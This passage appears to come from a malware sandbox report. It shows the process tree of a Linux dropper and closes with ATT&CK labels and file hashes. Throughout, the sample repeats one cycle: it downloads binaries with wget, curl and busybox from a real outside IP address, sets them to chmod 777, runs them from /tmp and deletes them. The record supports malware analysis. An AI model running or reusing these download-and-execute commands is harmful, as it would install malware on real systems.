/usr/bin/curlcurl -O http://87.120.126.196/bins/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵
- Writes file to tmp directory
PID:1635
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵PID:1636
-
-
/bin/chmodchmod 777 Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵
- File and Directory Permissions Modification
PID:1637
-
-
/tmp/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t9./Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵
- Executes dropped EXE
PID:1638
-
-
/bin/rmrm Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵PID:1639
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵PID:1640
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵
- Writes file to tmp directory
PID:1641
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵PID:1642
-
-
/bin/chmodchmod 777 ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵
- File and Directory Permissions Modification
PID:1643
-
-
/tmp/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ./ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵
- Executes dropped EXE
PID:1644
-
-
/bin/rmrm ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵PID:1645
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵PID:1646
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵
- Writes file to tmp directory
PID:1647
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵PID:1648
-
-
/bin/chmodchmod 777 yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵
- File and Directory Permissions Modification
PID:1649
-
-
/tmp/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD0./yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵
- Executes dropped EXE
PID:1650
-
-
/bin/rmrm yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵PID:1651
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵PID:1652
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵
- Writes file to tmp directory
PID:1653
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵PID:1654
-
-
/bin/chmodchmod 777 jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵
- File and Directory Permissions Modification
PID:1655
-
-
/tmp/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM./jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵
- Executes dropped EXE
PID:1656
-
-
/bin/rmrm jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵PID:1657
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵PID:1658
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵
- Writes file to tmp directory
PID:1659
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵PID:1660
-
-
/bin/chmodchmod 777 LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵
- File and Directory Permissions Modification
PID:1661
-
-
/tmp/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv./LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵
- Executes dropped EXE
PID:1662
-
-
/bin/rmrm LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵PID:1663
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵PID:1664
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵
- Writes file to tmp directory
PID:1665
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵PID:1666
-
-
/bin/chmodchmod 777 x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵
- File and Directory Permissions Modification
PID:1667
-
-
/tmp/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB./x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵
- Executes dropped EXE
PID:1668
-
-
/bin/rmrm x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵PID:1669
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97